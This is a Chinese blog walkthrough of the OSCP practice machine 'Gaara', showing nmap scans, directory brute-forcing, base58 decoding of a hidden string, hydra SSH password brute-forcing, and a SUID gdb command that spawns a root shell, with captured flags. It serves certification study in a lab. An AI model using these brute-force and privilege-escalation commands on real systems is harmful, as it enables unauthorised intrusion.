OSCP系列靶场-Esay-Gaara

最新推荐文章于 2024-01-09 09:35:38 发布
最新推荐文章于 2024-01-09 09:35:38 发布
阅读量3k 收藏
点赞数
分类专栏: OSCP 文章标签: 安全 网络 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61812944/article/details/132138909
版权

OSCP系列靶场-Esay-Gaara

目录

总结

getwebshell → 通过大字典爆破得到端点 → 利用工具对比得到加密信息 → 寻求百度帮助确认加密方式 → 解密得到用户名 → ssh爆破密码登录

提 权 思 路 → suid-gdb提权

准备工作

  • 启动VPN
    获取攻击机IP > 192.168.45.194

  • 启动靶机
    获取目标机器IP > 192.168.227.142

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次
sudo nmap --min-rate 10000 -p- 192.168.227.142

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http


通过两次收集到的端口:→22,80

目标端口对应服务探测

# tcp探测
sudo nmap -sT -sV -O -sC -p22,80 192.168.227.142

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
|   256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_  256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.18 (87%), Linux 4.15 - 5.8 (87%), Linux 5.0 - 5.4 (87%), Linux 2.6.32 (87%), Linux 2.6.32 or 3.10 (87%), Linux 2.6.39 (87%), Linux 3.10 - 3.12 (87%), Linux 3.4 (87%), Linux 3.7 (87%), Linux 4.4 (87%)

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用

通过Nmap探测获得SSH的版本信息,可以尝试利用
探测版本为OpenSSH 7.9p1 Debian

# 进入msf
msfconsole
# 搜索对应脚本
msf6 > searchsploit openssh 7.9p1

22-SSH协议支持的登录方式

通过Nmap探测获得SSH的版本信息,在获取到某个用户名之后尝试

ssh root @ 192.168.227.142 -v
# 如果显示publickey、password就是支持密钥以及密码登录

22-SSH弱口令爆破(待定)

尝试root账户的密码爆破,利用工具hydra,线程-t为6

hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.227.142 ssh -s 22

静静爆破,等待结果

22-SSH手动登录尝试(无)

尝试root账户的密码爆破发现报错之后进行手动尝试

ssh root<span>@192.168.227.142</span> -p 22
# 密码尝试
password &gt; root

80-HTTP端口的信息收集

访问 http://192.168.227.142:80 是一张我爱罗的图片,应该是一个个人站点,从源码查看开始

信息收集-源码查看
# 包括文章中是否写明一些敏感信息
curl http://192.168.227.142:80

    Gaara
        <img src="gaara.jpg" alt="wallpaper" width="100%" height="100%">

没什么利用信息

信息收集-目录扫描
信息收集-目录扫描初步
dirsearch -u http://192.168.227.142:80 -x 302,403

200 -  137B  - /index.html


发现没有扫描出内容,决定换一个扫描工具上大字典,不清楚脚本语言,先不加

信息收集-目录扫描(深度/大字典)
gobuster dir -u http://192.168.227.142:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 1000 -k

通过大字典扫描出了一个端点/Cryoserver

信息收集-目录访问

/Cryoserver端点访问
访问 http://192.168.227.142:80/Cryoserver 发现是空白,进行信息收集尝试,若无思路可能要爆破后缀的字典

信息收集-源码查看
# 包括文章中是否写明一些敏感信息
curl http://192.168.227.142:80/Cryoserver

通过查看源码,发现了好像有3个额外的端点


尝试进行访问,发现是3篇文章,看上去差不多
/Temari


/Kazekage


/iamGaara

端点分析

利用wget下载之后发现还是存在一定的区别的


通过chatgpt的回答下载了文本对比工具meld准备对三个文件进行比较


发现文本中存在奇怪的换行以及多了的字符串f1MgN9mTf9SNbzRygcU

解密尝试

f1MgN9mTf9SNbzRygcU是什么类型的加密呢??
试了半天解不出来,百度一搜,emmmmm base58


百度了一个解密工具进行解密 https://tools.qsnctf.com/tools/Tools/Base58/index.php


得到了gaara:ismyname 推测是ssh登录的关键

漏洞利用-getwebshell

SSH登录尝试(失败)

获取账号密码之后利用SSH进行登录

ssh gaara @192.168.227.142 -p22
password &gt; ismyname

发现利用这个方式登录失败,研究ismyname的英文确定gaara是名字

暴力破解-SSH密码爆破hydra

这时候会想生成一个密码字典跑,但是这个网站给的信息太少了,生成cewl没用,尝试用hydra爆破

# -P指定密码字典
hydra -l gaara -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.227.142 ssh -s 22


[DATA] attacking ssh://192.168.227.142:22/
[STATUS] 147.00 tries/min, 147 tries in 00:01h, 865 to do in 00:06h, 16 active
[22][ssh] host: 192.168.227.142   login: gaara   password: iloveyou2
1 of 1 target successfully completed, 1 valid password found

[DATA] attacking ssh://192.168.227.142:22/
[STATUS] 147.00 tries/min, 147 tries in 00:01h, 865 to do in 00:06h, 16 active
[22][ssh] host: 192.168.227.142 login: gaara password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
得到了gaara的密码iloveyou2进行ssh登录

ssh gaara @192.168.227.142  -p22
password → iloveyou2

内网遨游-getshell

FLAG1获取

gaara @Gaara :~$ find / -name local.txt 2&gt;/dev/null
/home/gaara/local.txt
gaara @Gaara :~$ cat /home/gaara/local.txt
c7dde1de7308136cdf71fd56da509c56

信息收集-内网基础信息收集

提权的本质在于枚举,在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

检测Linux操作系统的发行版本

较老的Ubuntu以及Linux系统可以overlayfs提权

# 确定发行版本
lsb_release -a

发行版本为Debian,不太能overlayfs提权

检测Linux操作系统的内核版本

较低的内核版本可以进行脏牛提权

uname -a

内核版本为4.19

列举出所有的sudo文件

查找具有sudo权限,且不需要密码的可提权文件
如果发现sudo -l有东西的话 访问 https://gtfobins.github.io 寻找

# 利用sudo -l寻找
sudo -l

发现需要密码,使用gaara的密码失败

列举出所有suid文件

如果发现sudo -l有东西的话

# -perm 文件权限
find / -perm -u=s -type f 2&gt;/dev/null

访问 https://gtfobins.github.io 寻找


发现存在gdb

权限提升

suid-gdb提权
sudo install -m =xs $(which gdb) .
./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit


使用搜集到的提权命令进行提权

gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

提权成功

FLAG2获取

# cat /root/proof.txt
ec1e6ac3f00776edb8fac5807c14548b

完结撒花~

反思

从最开始访问80就在提示用户是gaara


再到后面发现的目录文件名iamgaara也在提示

杳若听闻
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OSCP靶场1-SolidState(smtp、pop3、james)
墨痕诉清风的博客
04-22 327
注:如果下载文件,通过 python -m http.server 80,进入 /tmp文件夹下载,否则经常出现没有权限。1. 可以看到这是台32位 debian 操作系统,内核版本 Linux 4.9.0,可以进行查找该内核提权漏洞。根据exp解释,当登录任意用户将执行反弹shell,利用了 /etc/bash_completion.d 机制。成功反弹,且因为payload利用的是sh,已经不受限制rbash了。利用ssh登录,但是被rbash限制,非常多的命令不能使用,退出。
OSCP系列靶场-Esay-PyExp保姆级
杳若的博客
08-21 1703
OSCP系列靶场-Esay-PyExp保姆级
OSCP系列靶场-Esay-Shakabrah
杳若的博客
08-16 170
OSCP系列靶场-Esay-Shakabrah
OSCP系列靶场-Esay-Sumo
HUANGXIN9898的博客
09-19 160
从发现ssh版本开始就感觉有点偏老,应该多尝试老漏洞有时候nikto工具也可以适当用一下,指不定有其他收获。
OSCP推荐靶场-Stapler
qq_63785498的博客
10-07 204
OSCP推荐靶场-Stapler
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
oscp-command-filtering-tool
03-08
oscp命令过滤工具特征根据工具,语言,意图,端口或操作系统轻松过滤命令自动更新kali和受害者IP地址,因此您不必手动修改命令过滤器很容易修改,可以添加/删除内容,也可以从全新开始用法替换所有IP(kali_ip)->要...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
OSCP-Exam-Report-Template-Markdown
04-02
我在Markdown中创建了攻击性安全考试报告模板,因此在进行攻击性安全OSCP,OSWE,OSCE,OSEE,OSWP,OSEP,OSED考试时,不再需要LaTeX,Microsoft Office Word,LibreOffice Writer! 现在,您可以在检查报告编辑...
OSCP靶场4-HL(命令注入、find提权)
墨痕诉清风的博客
05-06 171
级别:初级/中级Arp-scan或可用于发现租用的 IP 地址。在我的网络上,机器被分配了 IP 地址。让我们使用nmap扫描这台机器。使用nmap的端口扫描显示Apache服务器在端口 80 上运行。这是这台机器上唯一开放的端口,因此我们可以假设我们在这个机器上的立足点将通过一个易受攻击的 Web 应用程序或脚本(因为这是一个毕竟,CTF!)。192.168.10.42 主机的 Nmap 扫描报告已启动(0.0083 秒延迟)。未显示:65534 关闭端口。
类OSCP靶机-Kioptix Level 2
ETO发展中心
08-02 410
同步发布:https://www.youi.xin/?p=449 1.信息收集 环境部署可参考上一篇https://www.youi.xin/?p=435 通过对c段扫描发现了靶机ip,nmap扫描目标端口信息如下: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a.
OSCP推荐靶场-FristiLeaks
qq_63785498的博客
10-06 363
SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。: 这是Shell程序的名称,它会启动一个新的Shell会话。: 这是Linux系统上的一个用于查找文件和目录的命令。
OSCP靶场系列-Esay-BBSCute保姆级
杳若的博客
07-23 5598
BBSCute保姆级靶场流程
靶场实战(12):OSCP备考之VulnHub SEPPUKU
最新发布
OneMoreThink
01-09 1000
打靶思路资产发现主机发现服务发现(端口、服务、组件、版本)漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)7080端口/HTTPS服务组件漏洞URL漏洞(目录、文件)7601端口/HTTP服务组件漏洞URL漏洞(目录、文件)提升权限seppuku用户sudosuidcron内核提权信息收集samurai用户sudosuidcron内核提...
OSCP靶场7-Assertion(目录穿越、命令执行、aria2c提权)
墨痕诉清风的博客
06-07 256
扫描和枚举我们将从扫描目标机器上的开放端口和服务开始,并记住将结果存储在某个地方以便我们可以返回它。还要记住,最好使用 -p- 标志检查所有端口以防万一。-p- *目标 ip* > nmapPn - 这是告诉 nmap 正在扫描的目标已启动并正在运行,因此不必担心检查是否已启动。sV – 检查端口以确定服务/版本sC – 使用脚本检查漏洞只打开了两个端口,这可能好,也可能不好。以防万一我也运行 udp 扫描。UDP 方面似乎没有什么突出的。查看 http 站点,有一件事引起了我的注意。
OSCP - vulnhub BILLY MADISON: 1.1 靶机测试
m0_55751267的博客
08-12 983
BILLY MADISON: 1.1 靶机测试
废物的靶场日记 htb-oscp-beep+cronos+nineveh
m0_53302733的博客
03-29 1318
HTB-oscplike-beep+cronos+nineveh Beep easy难度的beep 靶机IP10.10.10.7 sudo nmap -sC -sV -A --min-rate=5000 -p- -Pn 10.10.10.7 访问80后发现是一个elastix searchsploit搜到php/webapps/18650.py 修改参数后发现有一个extension需要修改但是不知道是什么勾八 google elastix extension后发现是sip extension 用svwar
OSCP 备考破解靶机系列
kevinhanser
02-18 3298
测试的 VM 主机主要来源 www.vulnhub.com VM - Lazysysadmin 的破解
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值